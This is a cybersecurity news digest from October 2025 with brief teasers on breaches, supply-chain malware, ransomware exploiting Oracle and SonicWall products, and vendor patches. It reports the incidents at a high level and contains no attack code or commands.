Critical Flaws in Oracle & Redis Under Active Threat; Widespread Supply Chain Attacks Target Developers and Cloud Services

Publication Date: October 11, 2025

Summary

This intelligence briefing for October 11, 2025, covers a series of critical cybersecurity incidents. Major themes include the active exploitation of a zero-day in Oracle E-Business Suite by the Cl0p ransomware group and the patching of a 13-year-old RCE flaw in Redis. Supply chain attacks remain a dominant threat, with malicious npm and Node.js packages targeting developers, and a Discord breach originating from a third-party vendor. SonicWall disclosed two major incidents: active exploitation of its VPNs by Akira ransomware and a full-scale breach of its Cloud Backup service affecting all customers. Additionally, new malware strains like 'Chaosbot' and the AI-powered 'MalTerminal' demonstrate evolving attacker TTPs.

Today New Articles

Discord Breach Exposes 5.5M Users via Third-Party Vendor Compromise

Discord has officially confirmed a data breach that originated from a compromised third-party customer support vendor, Zendesk. The incident exposed the data of users who had interacted with Discord's support channels. Hackers claim to have exfiltrated informa...

175 Malicious NPM Packages Target Developers in Widespread Phishing Attack

A significant software supply chain attack has been identified on the npm open-source repository, where researchers discovered 175 malicious packages that were downloaded approximately 26,000 times. These packages were trojanized to execute credential phishing...

New 'Chaosbot' Malware Weaponizes Cisco VPN & AD Credentials for Lateral Movement

A new malware strain named "Chaosbot" has been discovered by security researchers. It specializes in using stolen Cisco VPN and Active Directory credentials to execute commands and move laterally within compromised corporate networks. By leveraging legitimate...

Akira Ransomware Gang Actively Exploiting SonicWall VPNs for Network Breaches

The Akira ransomware group is actively exploiting vulnerabilities in SonicWall SSL VPN devices to gain initial access to corporate networks. By targeting these widely used, internet-facing appliances, the threat actors can establish a foothold, move laterally,...

New 'Stealit' Malware Targets Developers via Malicious Node.js Extensions

A new information-stealing malware named "Stealit" is targeting Windows systems by using malicious Node.js extensions as its infection vector. This novel approach specifically targets software developers, aiming to steal sensitive data such as source code, API...

'MalTerminal' Malware Uses OpenAI's GPT-4 to Auto-Generate Ransomware Code

Researchers have discovered "MalTerminal," a novel malware that uses OpenAI's GPT-4 large language model (LLM) to dynamically generate ransomware code. This represents a significant and dangerous evolution in malware development, enabling the creation of polym...

Juniper Networks Patches 220 Flaws, Including Nine Critical Bugs Dating Back Years

Juniper Networks has released a massive security update for October 2025, addressing a total of 220 vulnerabilities across its broad portfolio of networking products. The patch bundle includes fixes for nine flaws rated as critical, posing a severe risk of rem...

Article Updates

Cl0p Ransomware Exploits Oracle E-Business Suite Zero-Day in Mass Attack

Update:New reports confirm Cl0p has sent ransom demands to Oracle E-Business Suite customers, indicating widespread compromise prior to the patch release. Evidence suggests exploitation may have been active since July 2025, earlier than initially reported. Organizati...